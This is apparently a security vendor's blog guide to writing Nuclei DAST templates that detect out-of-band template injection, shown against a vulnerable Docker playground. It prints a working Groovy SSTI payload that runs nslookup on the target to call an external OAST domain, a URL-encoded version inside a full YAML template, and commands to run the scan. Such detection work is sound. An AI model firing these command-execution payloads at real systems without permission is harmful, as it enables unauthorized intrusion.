7 min read
Crafting DAST Nuclei Templates for OOB Template Engines Injection: A Practical Guide
Table of Contents
Authors
We’re thrilled to announce the release of new DAST Out-of-Band Template Injection Templates tailored for various templating engines and programming frameworks. This update empowers us to assess vulnerabilities and misconfigurations in diverse tech stacks effectively. In this post, we’ll explore automating Out-of-Band Template Injection Testing, crafting custom vulnerability checks, and sharing the findings through the PDCP Cloud for streamlined collaboration.
For those particularly interested in using the OOB Template Engine Injection templates, feel free to skip to the end of the blog
To simplify the process of detecting Out-of-Band (OOB) Template Engine Injection vulnerabilities, we’ve wrote Nuclei templates in YAML format that fuzz for key security issues. These templates target various templating engines, helping quickly identify and assess injection points where user input is improperly handled, potentially leading to security risks like remote code execution (RCE), data leakage, or unauthorized access.
By using these templates, we can streamline Dynamic Application Security Testing (DAST), ensuring that applications are secure and resistant to OOB template injection attacks.
What are DAST Nuclei Templates?
DAST Nuclei Templates are designed to automate dynamic application security testing (DAST) by scanning live applications for vulnerabilities. These templates allow security researchers, penetration testers, and developers to define custom HTTP requests, matchers, and payloads that simulate real-world attacks like SQL injection, XSS, and remote code execution (RCE). By leveraging these templates, users can interact with web applications during runtime to identify vulnerabilities and misconfigurations.
DAST Nuclei templates provide a flexible, automated approach to dynamic testing, enabling users to customize their workflows for in-depth application security assessments. Explore the Fuzzing templates in our documentation for more details.
DAST templates can execute commands on hosts and are not included in default scans. To use these templates, you can run them by providing the-dastflag.
What Is Template Injection?
Template injection occurs when an attacker injects malicious input into templates processed by templating engines, potentially enabling them to execute unauthorized code or access sensitive data. This type of vulnerability is common in server-side templating engines and requires robust testing for detection and mitigation.
Setup for Template Injection Playground
- Clone the Repository
bash
1git clone https://github.com/Hackmanit/template-injection-playground.git- Navigate to the Directory
bash
1cd template-injection-playground- Start the Docker Container
bash
1docker-compose up -d- Get the container ID , image name, port number using
bash
1docker ps
- Use the container ID to inspect the container
bash
1docker inspect <container-id>
- Look for the "IPAddress" under the "Networks" section in the output.
- Navigate to the IPAddress with the Port number and Observe the response.
Example:
- In this example, we'll create a DAST template to detect Groovy Out-of-Band (OOB) Template Engine Injection. We'll begin by identifying the fingerprint and then check for the OOB vulnerability in the vulnerable setup.
/Groovy - is the route or path where the vulnerable Groovy setup is located.
- Provide some random input in the name field, click on "Submit," and then observe the response in Burp Suite.
- It can be observed that the input is being reflected in the response.
The payload ${7*7} is a simple example of a Groovy Template Engine Injection attempt. Here's a breakdown for a beginner:
${7*7}is a special part of the payload that uses Groovy's template syntax. Anything inside${}is treated as an expression by the Groovy Template Engine.- In this case,
7*7is an arithmetic operation, and the engine will calculate the result when it processes the input.
If this payload is processed by a vulnerable application using Groovy Template Engine, the output might look like this
bash
149
- The key idea here is that the
${}syntax is used to evaluate and inject dynamic content (in this case, the result of the multiplication) into the output. If the application doesn't properly filter or sanitize user input, this could be exploited.
SSTI to OOB Exploitation:
To escalate a Server-Side Template Injection (SSTI) vulnerability to execute system-level commands, you can use an Out-of-Band (OOB) exploitation technique. Here’s an updated payload:
cli
1${'nslookup -type=SRV 9zngatihqnif00r6i461uq.oastify.com'.execute().text}
Explanation:
nslookup -type=SRV: This command is used to query DNS SRV records for the specified domain.'9zngatihqnif00r6i461uq.oastify.com': This domain is used to trigger a callback to your Out-of-Band (OOB) service (in this case, an OAST service)..execute(): Executes thenslookupcommand on the target system..text: Captures the output of the command as text.
This payload, when executed, sends a DNS request to the specified OAST domain. By tracking the callback, you can confirm that the SSTI vulnerability is exploitable, potentially leading to further system-level command execution.
Using -type=SRV in a DNS callback payload helps reduce false positives by targeting only SRV record queries. SRV records are less common, so this makes the test more specific to the target system. It reduces noise from unrelated queries and minimizes interference from recursive resolvers. This ensures the callback results from the actual exploitation attempt.Crafting a DAST OOB Nuclei Template:
Here’s the template for OOB - Groovy Template Injection in DAST format
yaml
1id: groovy-oob
2
3info:
4 name: Groovy - Out of Band Template Injection
5 author: 0xAwali,DhiyaneshDK
6 severity: high
7 reference:
8 - https://docs.groovy-lang.org/
9 - https://medium.com/@0xAwali/template-engines-injection-101-4f2fe59e5756
10 metadata:
11 verified: true
12 tags: ssti,dast,oast,oob
13
14http:
15 - pre-condition:
16 - type: dsl
17 dsl:
18 - 'method == "GET"'
19
20 payloads:
21 injection:
22 - '%24%7Brce%3D%22nslookup%20-type%3DSRV%20{{interactsh-url}}%22%3Brce.execute%28%29.text%7D'
23
24 fuzzing:
25 - part: query
26 type: postfix
27 mode: single
28 fuzz:
29 - "{{injection}}"
30
31 matchers:
32 - type: dsl
33 name: request-matcher
34 dsl:
35 - "contains(interactsh_protocol,'dns')"
36 - "contains(interactsh_request,'srv')"
37 condition: andHTTP Section:
pre-condition: Specifies that the template should run only for HTTP GET requests.
yaml
1pre-condition:
2 - type: dsl
3 dsl:
4 - 'method == "GET"'payloads: Contains the Groovy template injection payload. This payload uses Out-of-Band (OOB) DNS requests for tracking.
yaml
1payloads:
2 injection:
3 - '%24%7Brce%3D%22nslookup%20-type%3DSRV%20{{interactsh-url}}%22%3Brce.execute%28%29.text%7D'This payload will execute nslookup -type=SRV on a vulnerable server to make a DNS request to an Interactsh URL.
Fuzzing:
- Defines the part of the HTTP request to fuzz (in this case, the query parameter) and applies the payload injection.
yaml
1fuzzing:
2 - part: query
3 type: postfix
4 mode: single
5 fuzz:
6 - "{{injection}}"Matchers:
request-matcher: Checks if the response contains DNS (dns) and SRV records (srv). This indicates a successful OOB interaction, confirming the vulnerability.
yaml
1matchers:
2 - type: dsl
3 name: request-matcher
4 dsl:
5 - "contains(interactsh_protocol,'dns')"
6 - "contains(interactsh_request,'srv')"
7 condition: andHow to Run the DAST Nuclei Templates ?
- To run the DAST Nuclei template, use the following command:
bash
1nuclei -u http://172.20.0.6:13373/Groovy?name= -t ssti-oob.yaml -vv -dast- Make sure to include the
-dastflag when running the DAST template you create.
Uploading Results to ProjectDiscovery Cloud Platform
To upload results to the cloud, you need to obtain an authentication token. Here are the steps to follow:
- Go to PDCP Cloud and log in to your account.
- Click on your profile picture in the top-right corner and select API key.
- Copy your API key, and in your terminal, type
bash
1nuclei -auth <your-api-key>Now you're all set to run the templates!
bash
1nuclei -l target.txt -t dast/vulnerabilities/ssti/oob -vv -dast -cloud-upload
Now that you've gathered numerous findings, you can easily access them on the Cloud. Just log in to PDCP Cloud, and you'll see a scan created with your results.
For DAST OOB Template Engine Injection, we have written 14 templates covering the following :
- Ruby: ERB, Erubi, Erubis
- Python: Jinja2, Mako, Bottle, Tornado, Chameleon
- PHP: Smarty, Twig, Latte, Blade
- Java: Freemarker, Velocity
- JavaScript: EJS, Pub.js, Pug.js, Underscore.js
- Others: Slim, Liquid, Cheetah, SAML, Dot.js
The dast directory in the Nuclei templates repository contains DAST
(Dynamic Application Security Testing) checks for identifying security vulnerabilities in web applications.
The setup and detailed payload examples used in this guide are inspired by the concepts outlined in the blog post "Template Engines Injection 101" by @0xAwali & Template Injection Playground by @hackmanit . This resource provides foundational insights into understanding and exploiting template engine vulnerabilities effectively.
Conclusion:
The Nuclei templates for DAST OOB Template Engine Injection offer excellent flexibility, enabling users to craft custom checks tailored to their specific environment and security needs. This approach helps in identifying and exploiting out-of-band injection vulnerabilities, facilitating the detection of template engine misconfigurations.
You can also join our Discord server. It's a great place to connect with fellow contributors and stay updated with the latest developments. Thank you, once again!
By leveraging Nuclei and actively engaging with the open-source community, or by becoming a part of the ProjectDiscovery Cloud Platform, companies can enhance their security measures, proactively address emerging threats, and establish a more secure digital landscape. Security represents a shared endeavor, and by collaborating, we can consistently adapt and confront the ever-evolving challenges posed by cyber threats.